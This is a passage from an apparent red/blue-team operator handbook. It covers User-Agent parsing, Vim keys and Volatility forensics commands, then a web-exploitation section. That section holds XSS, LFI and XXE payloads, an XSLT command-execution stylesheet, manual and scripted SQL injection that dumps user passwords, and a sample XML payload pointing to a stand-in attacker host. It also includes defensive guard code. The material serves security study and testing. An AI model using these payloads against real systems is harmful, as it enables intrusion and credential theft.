Windows  Edge 44                Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Windows  Firefox 33             Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Windows  Firefox 36             Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Windows  Firefox 43             Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Windows  Firefox 50             Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Windows  Firefox 50             Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Windows  Firefox 52             Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Windows  Firefox 61             Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Windows  Firefox 66             Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Windows  Firefox 67             Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Windows  IE 10                  Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Windows  IE 10                  Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Windows  IE 10                  Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Windows  IE 11                  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Windows  IE 6                   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Windows  IE 7                   Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Windows  IE 7                   Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Windows  IE 7                   Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Windows  IE 9                   Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Windows  IE 9                   Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Windows  IE 9                   Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
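The table shows why User-Agent classification cannot be done by naive substring matching: an EdgeHTML string also carries "Chrome" and "Safari" tokens, a Chrome string also carries "Safari", an Android string also says "Linux", and IE 11 has no "MSIE" token at all. The following is an added example (not from the Operator Handbook) that classifies a string into OS, browser and major version by testing the most specific token first, and tallies a batch of strings the way you would over a proxy or web-server log. The sample strings are copied from the table above.

```python
"""Classify User-Agent strings into (os, browser, major version).

Added example, not part of the Operator Handbook. The order of BROWSER_PATTERNS
is the whole point: Edge before Chrome, Chrome before Safari, MSIE before the
Trident/rv: form used by IE 11.
"""
import re
from collections import Counter

# First match wins, so specific tokens precede the generic ones they co-occur with.
BROWSER_PATTERNS = [
    ("Edge",    re.compile(r"\bEdge/(\d+)")),
    ("Chrome",  re.compile(r"\bChrome/(\d+)")),
    ("Firefox", re.compile(r"\bFirefox/(\d+)")),
    ("IE",      re.compile(r"\bMSIE (\d+)")),
    ("IE",      re.compile(r"\bTrident/\d+(?:\.\d+)?;.*\brv:(\d+)")),   # IE 11 dropped "MSIE"
    ("Safari",  re.compile(r"\bVersion/(\d+)(?:\.\d+)*.*\bSafari/")),  # only after Chrome ruled out
]

# Android strings also contain "Linux", and iOS strings say "like Mac OS X" but
# never "Macintosh", so the order and the exact tokens matter here too.
OS_PATTERNS = [
    ("Android", re.compile(r"\bAndroid\b")),
    ("iOS",     re.compile(r"\b(?:iPhone|iPad|iPod)\b")),
    ("Windows", re.compile(r"\bWindows NT\b")),
    ("macOS",   re.compile(r"\bMacintosh\b")),
    ("Linux",   re.compile(r"\bLinux\b")),
]


def classify(ua):
    """Return (os, browser, major_version); parts that cannot be determined are None."""
    os_name = next((name for name, pat in OS_PATTERNS if pat.search(ua)), None)
    for name, pat in BROWSER_PATTERNS:
        m = pat.search(ua)
        if m:
            return os_name, name, int(m.group(1))
    return os_name, None, None


def tally(user_agents):
    """Count (os, browser) pairs over a batch of strings, e.g. one column of a log."""
    return Counter((os_name, browser) for os_name, browser, _ in map(classify, user_agents))


# Constructed sample batch, taken from the table on this page.
SAMPLE_UAS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362",
    "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build/RB3N5C; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko)",
    "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
]

if __name__ == "__main__":
    for ua in SAMPLE_UAS:
        print(classify(ua), "<-", ua[:60])
    print(tally(SAMPLE_UAS))
```

Remember that the header is client-controlled: the tally describes what clients claim, which is useful for spotting outdated browsers or odd tooling in a log, not proof of what they are.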

VIM
ALL ADMINISTRATION WINDOWS/LINUX/MacOS
Vim is a highly customizable and extensible text editor.

GLOBAL
:help keyword open help for keyword
:o file open file
:saveas file save file as
:close close current pane
MOVE CURSOR
h move cursor left
j move cursor down
k move cursor up
l move cursor right
H move to top of screen
M move to middle of screen
L move to bottom of screen
w jump forwards to the start of a word
W jump forwards to the start of a WORD (whitespace-delimited; punctuation counts as part of it)
e jump forwards to the end of a word
E jump forwards to the end of a WORD
b jump backwards to the start of a word
B jump backwards to the start of a WORD
0 jump to the start of the line
^ jump to first non-blank char of line
$ jump to the end of the line
g_ jump to last non-blank char of line
gg go to the first line of the document
G go to the last line of the document
5G go to line 5
fx jump to next occur of character x
tx jump to before next occur of char x
} jump to next paragraph
{ jump to previous paragraph
zz center cursor on screen
Ctrl + b move back one full screen
Ctrl + f move forward one full screen
Ctrl + d move forward 1/2 a screen
Ctrl + u move back 1/2 a screen
INSERT MODE
i insert before the cursor
I insert at the beginning of the line
a insert (append) after the cursor
A insert (append) at end of the line
o append (open) a new line below the current line
O append (open) a new line above the current line
ea insert (append) at the end of the word
Esc exit insert mode
EDITING
r replace a single character
J join line below to the current one
cc change (replace) entire line
cw change (replace) to the start of the next word
ce change (replace) to the end of the next word
cb change (replace) to the start of the previous word
c0 change (replace) to the start of the line
c$ change (replace) to the end of the line
s delete character and substitute text
S delete line and substitute text (same as cc)
xp transpose two letters (delete and paste)
. repeat last command
u undo
Ctrl + r redo
MARKING TEXT
v start visual mode
V start linewise visual mode
o move to other end of marked area
O move to other corner of block
aw mark a word
ab a block with ()
aB a block with {}
ib inner block with ()
iB inner block with {}
Esc exit visual mode
Ctrl + v start visual block mode
VISUAL CMDS
> shift text right
< shift text left
y yank (copy) marked text
d delete marked text
~ switch case
CUT/PASTE
yy yank (copy) a line
2yy yank (copy) 2 lines
yw yank (copy) chars from the cursor to the start of the next word
y$ yank (copy) to end of line
p put (paste) the clipboard after cursor
P put (paste) before cursor
dd delete (cut) a line
2dd delete (cut) 2 lines
dw delete (cut) chars from cursor to the start of the next word
D delete (cut) to the end of the line
d$ delete (cut) to the end of the line
d^ delete (cut) to the first non-blank character of the line
d0 delete (cut) to the beginning of the line
x delete (cut) character
SEARCH/REPLACE
/pattern search for pattern
?pattern search backward for pattern
\vpattern extended ("very magic") pattern: non-alphanumeric chars treated as regex
n repeat search in same direction
N repeat search in opposite direction
:%s/old/new/g replace all old with new throughout file
:%s/old/new/gc replace all old with new throughout file, with confirmations
:noh remove highlighting of search matches
SEARCH MULTI FILES
:vimgrep /pattern/ {file} search for pattern in multiple files
:cn jump to the next match
:cp jump to the previous match
:copen open a window containing the list of matches
EXITING
:w write (save) the file
:w !sudo tee % write out the current file using sudo
:wq or :x or ZZ write (save) and quit
:q quit (fails if there are unsaved changes)
:q! or ZQ quit and throw away unsaved changes
WORK MULTI FILES
:e file edit a file in a new buffer
:bnext or :bn go to the next buffer
:bprev or :bp go to the previous buffer
:bd delete a buffer (close a file)
:ls list all open buffers
:sp file open a file in a new buffer and split window
:vsp file open a file in a new buffer and vertically split window
Ctrl + ws split window
Ctrl + ww switch windows
Ctrl + wq quit a window
Ctrl + wv split window vertically
Ctrl + wh move cursor to the left window (vertical split)
Ctrl + wl move cursor to the right window (vertical split)
Ctrl + wj move cursor to the window below (horizontal split)
Ctrl + wk move cursor to the window above (horizontal split)
TABS
:tabnew or :tabnew file open a file in a new tab
Ctrl + wT move the current split window into its own tab
gt or :tabnext or :tabn move to the next tab
gT or :tabprev or :tabp move to the previous tab
<number>gt move to tab <number>
:tabmove <number> move current tab to the <number>th position (indexed from 0)
:tabclose or :tabc close the current tab and all its windows
:tabonly or :tabo close all tabs except for the current one
:tabdo command run the command on all tabs
:tabdo q run :q on every tab, closing them all

REFERENCE:
[Link]

VOLATILITY
RED/BLUE TEAM FORENSICS WINDOWS/LINUX/MacOS
Volatility is an open-source memory forensics framework for incident response and
malware analysis. It is written in Python and supports Microsoft Windows, Mac OS X,
and Linux. Releases are available as zip and tar archives, Python module installers,
and standalone executables. The commands below use the Volatility 2 syntax ([Link]
with --profile); Volatility 3 drops profiles and renames its plugins (for example
windows.pslist), so they do not carry over unchanged. Every example after the first
two omits the -f <image> --profile=<profile> options, which are always required.

COMMAND                                                                    DESCRIPTION
[Link] -f <image> --profile=<profile> <plugin>                             Sample command format
[Link] -f [Link] timeliner --output-file [Link] --output=body --profile=Win10x64    Timeliner plugin parses time-stamped objects found in memory images
[Link] -f [Link] imageinfo                                                 Display memory image metadata, including suggested profiles
[Link] apihooks                                                            Find API/DLL function hooks
[Link] autoruns -v                                                         Map ASEPs to running processes (community plugin, not in the core release)
[Link] cmdscan                                                             Scan for COMMAND_HISTORY buffers
[Link] consoles                                                            Scan for CONSOLE_INFORMATION output
[Link] dlldump --dump-dir ./output -r <dll>                                Extract DLLs from specific processes
[Link] dlllist -p ###                                                      List DLLs loaded by a process, by PID
[Link] driverirp -r tcpip                                                  Identify I/O Request Packet (IRP) hooks
[Link] dumpfiles -n -i -r \\.exe --dump-dir=./                             Extract FILE_OBJECTs from memory
[Link] dumpregistry --dump-dir ./output                                    Extract all available registry hives
[Link] filescan                                                            Scan memory for FILE_OBJECT handles
[Link] getsids -p ###                                                      Print process security identifiers by PID
[Link] handles -p ### -t File,Key                                          List open handles for each process {Process, Thread, Key, Event, File, Mutant, Token, Port}
[Link] hashdump                                                            Dump user NTLM and LanMan hashes
[Link] hivedump -o 0xe1a14b60                                              Print all keys and subkeys in a hive; -o is the virtual offset of the hive (from hivelist)
[Link] hivelist                                                            Find and list available registry hives
[Link] hollowfind -D ./output_dir                                          Detect process hollowing techniques (community plugin)
[Link] idt                                                                 Display Interrupt Descriptor Table
[Link] imagecopy -f [Link] -O [Link] --profile=Win7SP1x64                  Convert alternate memory sources (hibernation file, crash dump, VM snapshot) to raw
[Link] imagecopy -f [Link] -O [Link] --profile=Win2016x64_14393            Convert alternate memory sources to raw
[Link] ldrmodules -p ### -v                                                Detect unlinked DLLs
[Link] malfind --dump-dir ./output_dir                                     Find possible malicious injected code and dump sections
[Link] memdump --dump-dir ./output -p ###                                  Extract every memory section of a process into one file
[Link] moddump --dump-dir ./output -r <driver>                             Extract kernel drivers
[Link] modscan                                                             Scan memory for loaded, unloaded, and unlinked drivers
[Link] netscan                                                             Scan for TCP connections and sockets
[Link] printkey -K "Microsoft\Windows\CurrentVersion\Run"                  Output a registry key, subkeys, and values
[Link] procdump --dump-dir ./output -p ###                                 Dump process to executable sample
[Link] pslist                                                              High level view of running processes (walks the EPROCESS linked list)
[Link] pstree                                                              Display parent-process relationships
[Link] psxview                                                             Find hidden processes using cross-view
[Link] ssdt                                                                Hooks in System Service Descriptor Table
[Link] svcscan -v                                                          Scan for Windows Service record structures
[Link] userassist                                                          Find and parse UserAssist key values
[Link]                                                                     Scan memory for EPROCESS blocks
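psxview's "cross-view" works by listing every process found by several independent techniques (the EPROCESS linked list that pslist walks, pool-tag scanning of EPROCESS blocks, thread scanning, csrss handle tables and others) and marking which technique saw each one; a process the scanners still find but the linked list no longer contains is the classic DKOM-unlinking signature. The following is an added example, not part of Volatility, that applies that rule to constructed psxview-style rows and separates a genuinely hidden process from a terminated one whose pool memory simply has not been reused yet.

```python
"""Cross-view hidden-process check in the spirit of Volatility's psxview.

Added example; the rows are constructed, not real psxview output, and only
four of psxview's columns are modelled.
"""

# (pid, name, pslist, psscan, thrdproc, csrss): True if that view saw the process.
# System and csrss.exe are legitimately absent from the csrss column: csrss
# does not hold handles to itself or to the kernel's System process.
SAMPLE_PSXVIEW = [
    (4,    "System",       True,  True,  True,  False),
    (520,  "csrss.exe",    True,  True,  True,  False),
    (1188, "explorer.exe", True,  True,  True,  True),
    (2440, "svchost.exe",  False, True,  True,  True),   # unlinked from the EPROCESS list
    (3012, "notepad.exe",  False, True,  False, False),  # exited; pool residue only
]


def hidden_candidates(rows):
    """Split rows missing from pslist into two buckets.

    hidden: still seen by a live view (threads or csrss handles), so the
            process exists and was unlinked on purpose.
    stale:  seen only by the pool scanner, which also finds freed EPROCESS
            blocks of processes that have already exited.
    """
    hidden, stale = [], []
    for pid, name, pslist, psscan, thrdproc, csrss in rows:
        if pslist:
            continue
        if thrdproc or csrss:
            hidden.append((pid, name))
        elif psscan:
            stale.append((pid, name))
    return hidden, stale


if __name__ == "__main__":
    hidden, stale = hidden_candidates(SAMPLE_PSXVIEW)
    print("hidden (investigate):", hidden)
    print("stale (likely exited):", stale)
```

On a real image, confirm a "hidden" hit with pstree (does its parent exist?), dlllist and malfind on that PID before calling it malicious; a security product that hooks process creation can also produce rows that look odd in one column.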

REFERENCE:

[Link]
[Link]
[Link]
[Link]

WEB_Exploit
RED TEAM ENUM/SQLI/XSS/XXE WEB

Web Enumeration
Dirsearch
dirsearch -u [Link] -e sh,txt,htm,php,cgi,html,pl,bak,old
dirsearch -u [Link] -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist
dirsearch -u [Link] -e .

dirb
dirb [Link] /path/to/wordlist
dirb [Link] /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old

Gobuster
gobuster -u [Link] -w /usr/share/wordlists/dirb/[Link]
(gobuster 3.x moved each mode into a subcommand: gobuster dir -u [Link] -w <wordlist>)

LFI (Local File Inclusion)

Vulnerable parameter
[Link]

Ways to Check/Verify/Test
[Link]encode/resource=index

[Link]

[Link]

Search for LFI payloads:

Payload All the Things
[Link]e%20Inclusion/Intruders
Seclist LFI Intruder
[Link]

XSS Reflected
Simple XSS Tests
<script>alert('Found')</script>

"><script>alert('Found')</script>">

<script>alert([Link](88,83,83))</script>

Bypass filter of tag script (break out of an attribute value and use an event handler instead)

" onload="alert([Link](88,83,83))

" onload="alert('XSS')

<img src='bla' onerror=alert("XSS")>

Persistent
>[Link]="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HELLOWORLD!</h1></div>";

Download via XSS (hidden iframe that makes the victim's browser fetch a file)

<iframe src="[Link]" height="0" width="0"></iframe>

Search for XSS payloads:

Payload All The Things
[Link]%20Injection
Seclist XSS
[Link]

XML VULNERABILITIES
XML External Entities expansion / XXE
XML External Entity attack is a type of attack against an
application that parses XML input. This attack occurs when XML
input containing a reference to an external entity is processed by
a weakly configured XML parser. This attack may lead to the
disclosure of confidential data, denial of service, server side
request forgery, port scanning from the perspective of the machine
where the parser is located, and other system impacts.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "[Link]" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "[Link]" >]><foo>&xxe;</foo>

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "[Link]">
]>
<r>&sp;</r>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "[Link]" >]><foo>&xxe;</foo>

Other XXE payloads worth testing:

XXE-Payloads
[Link]
Blind-XXE-Payload
[Link]

DTD Retrieval
Some XML libraries like Python's [Link] retrieve document
type definitions from remote or local locations. Several attack
scenarios from the external entity case apply to this issue as
well.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"[Link]">
<html>
<head/>
<body>text</body>
</html>

Decompression Bomb
Decompression bombs (aka ZIP bombs) apply to all XML libraries that can parse
compressed XML streams, such as gzipped HTTP bodies or LZMA-compressed files. For an
attacker it reduces the amount of transmitted data by three orders of magnitude or
more: 1 GiB of zeros becomes about 1 MiB with gzip and under 150 KiB with LZMA.

$ dd if=/dev/zero bs=1M count=1024 | gzip > [Link]
$ dd if=/dev/zero bs=1M count=1024 | lzma -z > [Link]
$ ls -sh zeros.*
1020K [Link]
148K [Link]
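The defence against the bomb above is to never let a decompressor run to completion on untrusted input: inflate incrementally and stop as soon as the output exceeds a size or ratio budget. The following is an added example (not from the Operator Handbook) using Python's zlib.decompressobj, which inflates in bounded pieces, unlike gzip.decompress(), which only reports the size after it has already allocated everything. The bomb it checks is constructed in memory: 10 MiB of zeros, about 10 KiB compressed, in the shape of the dd | gzip command above.

```python
"""Bounded decompression: abort a gzip/zlib stream that inflates past a budget.

Added example, not part of the Operator Handbook or of any XML library.
"""
import gzip
import zlib

MAX_OUTPUT = 1 * 1024 * 1024   # 1 MiB of inflated data is generous for an XML document
MAX_RATIO = 100                # budget relative to input size; real text rarely exceeds ~20:1


class DecompressionBomb(ValueError):
    """Raised when inflating would exceed the configured budget."""


def bounded_decompress(data, max_output=MAX_OUTPUT, max_ratio=MAX_RATIO):
    """Inflate `data` (gzip or zlib framing) but stop early once the output
    would exceed `max_output` bytes or `max_ratio` times the input size."""
    d = zlib.decompressobj(wbits=zlib.MAX_WBITS | 32)   # 32: auto-detect gzip/zlib header
    budget = min(max_output, max_ratio * max(len(data), 1))
    out = bytearray()
    chunk = data
    while not d.eof:
        piece = d.decompress(chunk, 64 * 1024)          # never more than 64 KiB per call
        out += piece
        if len(out) > budget:
            raise DecompressionBomb(
                f"{len(data)} compressed bytes inflated past {budget} bytes")
        chunk = d.unconsumed_tail                       # input zlib has not read yet
        if not piece and not chunk:
            break                                       # tru‌ncated stream: nothing more to do
    return bytes(out)


def is_bomb(data, **limits):
    """True if bounded_decompress() would refuse the stream under `limits`."""
    try:
        bounded_decompress(data, **limits)
    except DecompressionBomb:
        return True
    return False


def make_zero_bomb(size=10 * 1024 * 1024):
    """Constructed test input: `size` zero bytes, gzip-compressed (roughly 1000:1)."""
    return gzip.compress(bytes(size))


if __name__ == "__main__":
    bomb = make_zero_bomb()
    print(f"bomb: {len(bomb)} bytes compressed, detected={is_bomb(bomb)}")
    print(bounded_decompress(gzip.compress(b"<root><item>hello</item></root>")))
```

The ratio check matters as much as the absolute cap: a 10 KiB request that wants to become 1 MiB is suspicious in itself, and the same budgeting has to be applied to XML entity expansion, which is a decompression bomb in a different encoding.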

XPath Injection
XPath injection attacks work much like SQL injection attacks. Arguments to XPath
queries must be quoted and validated properly, especially when they are taken from
the user. The page "Avoid the dangers of XPath injection" lists some ramifications of
XPath injection.

XInclude
XML Inclusion is another way to load and include external files:
<root xmlns:xi="[Link]">
<xi:include href="[Link]" parse="text" />
</root>

This feature should be disabled when XML files from an untrusted source are
processed. Some Python XML libraries and libxml2 support XInclude but have no option
to sandbox inclusion and limit it to allowed directories.
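The XXE, DTD retrieval and XInclude passages above share one practical defence: since the declarations that enable all three (a DOCTYPE or ENTITY declaration, or the XInclude namespace) must appear literally in the document, untrusted input can be rejected before any parser touches it. The following is an added example (not from the Operator Handbook, and not the code of the defusedxml package, though it applies the same rule) that implements that pre-parse guard. Python's stdlib parsers (xml.etree, xml.sax, xml.dom) have no single switch to forbid a DOCTYPE, which is why the check is done on the raw bytes. The payloads are constructed in the shape of the ones shown above; the hostname in the remote-DTD sample is made up.

```python
"""Pre-parse guard for untrusted XML: refuse DTDs and XInclude outright.

Added example, not part of the Operator Handbook or of any XML library.
"""
import re
import xml.etree.ElementTree as ET

# XML keywords are case-sensitive, so plain byte patterns are enough.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b")
ENTITY_RE = re.compile(rb"<!ENTITY\b")
# The XInclude namespace URI is fixed by the W3C specification.
XINCLUDE_RE = re.compile(rb"[\"']http://www\.w3\.org/2001/XInclude[\"']")


class UnsafeXML(ValueError):
    """Input that must not reach a general-purpose XML parser."""


def check_untrusted_xml(data):
    """Raise UnsafeXML for DOCTYPE/ENTITY declarations (external entities, entity
    expansion, remote DTD retrieval) or the XInclude namespace. Fails closed: a
    DOCTYPE inside a comment is rejected too, which is the right trade-off here."""
    if not isinstance(data, bytes):
        data = data.encode("utf-8")
    if DOCTYPE_RE.search(data) or ENTITY_RE.search(data):
        raise UnsafeXML("DOCTYPE/ENTITY declaration in untrusted input")
    if XINCLUDE_RE.search(data):
        raise UnsafeXML("XInclude namespace in untrusted input")


def is_safe(data):
    try:
        check_untrusted_xml(data)
    except UnsafeXML:
        return False
    return True


def parse_untrusted(data):
    """Guard first, then parse with the stdlib; the parser never sees a DTD."""
    check_untrusted_xml(data)
    return ET.fromstring(data)


# Constructed samples, shaped like the payloads on this page.
XXE_FILE = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<foo>&xxe;</foo>')
REMOTE_DTD = (b'<?xml version="1.0"?>'
              b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
              b'"http://attacker.example/evil.dtd"><html><body>text</body></html>')
BILLION_LAUGHS = (b'<!DOCTYPE lolz [<!ENTITY lol "lol">'
                  b'<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
                  b'<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">]>'
                  b'<lolz>&lol3;</lolz>')
XINCLUDE = (b'<root xmlns:xi="http://www.w3.org/2001/XInclude">'
            b'<xi:include href="/etc/passwd" parse="text"/></root>')
BENIGN = b'<?xml version="1.0"?><order><item sku="A1">2</item></order>'

if __name__ == "__main__":
    for label, doc in [("xxe", XXE_FILE), ("remote dtd", REMOTE_DTD),
                       ("billion laughs", BILLION_LAUGHS), ("xinclude", XINCLUDE),
                       ("benign", BENIGN)]:
        print(f"{label:15s} safe={is_safe(doc)}")
```

Rejecting every DOCTYPE is the simplest rule that covers all three attack classes at once; if a legitimate feed needs a DTD, the alternative is a parser configured to resolve nothing (no external entities, no parameter entities, no network), which is a per-library setting and easy to get wrong.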

XSL Transformation
You should keep in mind that XSLT is a Turing complete language. Never process XSLT
code from an unknown or untrusted source! XSLT processors may allow you to interact
with external resources in ways you can't even imagine. Some processors even support
extensions that allow read/write access to the file system, access to JRE objects or
scripting with Jython.

Example from Attacking XML Security for Xalan-J:

<xsl:stylesheet version="1.0"
xmlns:xsl="[Link]"
xmlns:rt="[Link]"
xmlns:ob="[Link]"
exclude-result-prefixes="rt ob">
<xsl:template match="/">
<xsl:variable name="runtimeObject" select="rt:getRuntime()"/>
<xsl:variable name="command" select="rt:exec($runtimeObject, &apos;c:\Windows\system32\[Link]&apos;)"/>
<xsl:variable name="commandAsString" select="ob:toString($command)"/>
<xsl:value-of select="$commandAsString"/>
</xsl:template>
</xsl:stylesheet>

Manual SQL Injection

Simple test: add a single quote '

[Link]

Fuzzing ORDER BY columns to find the column count

[Link] order by 1
[Link] order by 2
[Link] order by 3
... until an error appears; the last number that worked is the column count

Finding which column is echoed back

MYSQL
[Link] union select 1, 2, 3
(use the same number of columns found in the previous step)

POSTGRES
[Link] union select NULL, NULL, NULL
(use the same number of columns found in the previous step)
In MySQL the echoed column shows its number in the page. With the NULL form,
replace one NULL at a time with a string literal until it appears.

Finding the version
MYSQL
[Link] union select 1, 2, version()

POSTGRES
[Link] union select NULL, NULL, version()

Finding the database name
MYSQL
[Link] union select 1, 2, database()

POSTGRES
[Link] union select NULL, NULL, current_database()

Finding the current database user
MYSQL
[Link] union select 1, 2, current_user()

Finding databases
MYSQL
[Link] union select 1, 2, schema_name from information_schema.schemata

POSTGRES
[Link] union select NULL, NULL, datname from pg_database

Finding table names from a database
MYSQL
[Link] union select 1, 2, table_name from information_schema.tables where table_schema='database_name'

POSTGRES
[Link] union select NULL, NULL, table_name from information_schema.tables where table_catalog='database_name' and table_schema='public'

Finding column names from a table
MYSQL
[Link] union select 1, 2, column_name from information_schema.columns where table_schema='database_name' and table_name='tablename'

POSTGRES
[Link] union select NULL, NULL, column_name from information_schema.columns where table_catalog='database_name' and table_name='tablename'

Concatenate (dump login and password in a single echoed column)
MYSQL
[Link] union select 1, 2, concat(login,':',password) from users;

POSTGRES
[Link] union select NULL, NULL, login||':'||password from users;

Note on quoting: in PostgreSQL double quotes delimit identifiers, so string values
must use single quotes; MySQL accepts both unless ANSI_QUOTES is set. NULL is used
as the filler for PostgreSQL because its UNION requires compatible column types,
which an integer literal may not satisfy.
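The steps above (single quote, ORDER BY until it errors, UNION SELECT with that many columns, then dump users) are mechanical enough to script. The following is an added example, not from the Operator Handbook, that drives them against a deliberately vulnerable query on a constructed in-memory SQLite database, then runs the same payload against the parameterised version of the query to show why it fails there. SQLite is used so the example runs offline; its string concatenation is || like PostgreSQL, and its version function is sqlite_version(), so only those details differ from the tables above.

```python
"""UNION-based SQL injection, automated against a constructed SQLite database.

Added example, not part of the Operator Handbook. The schema and rows are
made up; find_product_vuln is intentionally vulnerable, find_product_safe is
the corrected form.
"""
import sqlite3


def make_db():
    """Constructed sample database: a product lookup table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (login TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        INSERT INTO users VALUES ('admin', 'Winter2020!'), ('bob', 'hunter2');
    """)
    return conn


def find_product_vuln(conn, product_id):
    """The vulnerable pattern: user input pasted straight into the SQL text."""
    sql = f"SELECT name, price, id FROM products WHERE id = {product_id}"
    return conn.execute(sql).fetchall()


def find_product_safe(conn, product_id):
    """Parameter binding: the input is a value, never part of the statement."""
    return conn.execute(
        "SELECT name, price, id FROM products WHERE id = ?", (product_id,)).fetchall()


def is_injectable(conn):
    """Step 1 on the page: a lone quote breaks the statement."""
    try:
        find_product_vuln(conn, "1'")
    except sqlite3.OperationalError:
        return True
    return False


def count_columns(conn, limit=20):
    """Step 2: ORDER BY n succeeds while n <= column count and errors beyond it."""
    for n in range(1, limit + 1):
        try:
            find_product_vuln(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count not found within limit")


def dump_users(conn):
    """Step 3: UNION with the right column count; id = -1 keeps real rows out so
    only injected rows come back. NULL fillers sidestep type mismatches."""
    ncols = count_columns(conn)
    filler = ", ".join(["NULL"] * (ncols - 1))
    payload = f"-1 UNION SELECT login || ':' || password, {filler} FROM users"
    return sorted(row[0] for row in find_product_vuln(conn, payload))


if __name__ == "__main__":
    conn = make_db()
    print("injectable:", is_injectable(conn))
    print("columns:", count_columns(conn))
    print("dumped:", dump_users(conn))
    payload = "-1 UNION SELECT login || ':' || password, NULL, NULL FROM users"
    print("same payload, parameterised query:", find_product_safe(conn, payload))
```

The parameterised query returns nothing for the payload because the whole string is compared against the integer id column as a value; no part of it is ever parsed as SQL, which is the property that makes binding the fix rather than input filtering.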

Error Based SQLi (usually MS-SQL)

Current user
[Link] or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--

DBMS version
[Link] or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--

Database name
[Link] or db_name(0)=0 --

Tables from a database
[Link] or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--

[Link] or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--

Columns within a table
[Link] or 1 in (SELECT TOP 1 CAST(dbname..[Link] as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..[Link]=dbname..[Link] AND dbname..[Link] = 'tablename')--
**Remember to change dbname and tablename to match the situation. Each iteration
reveals one new column name; add it to the "previously found column name" list,
comma separated, as in the next sample:

[Link] or 1 in (SELECT TOP 1 CAST(dbname..[Link] as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..[Link]=dbname..[Link] AND dbname..[Link] = 'tablename' AND dbname..[Link] NOT IN('previously found column name', ...))--

Actual data
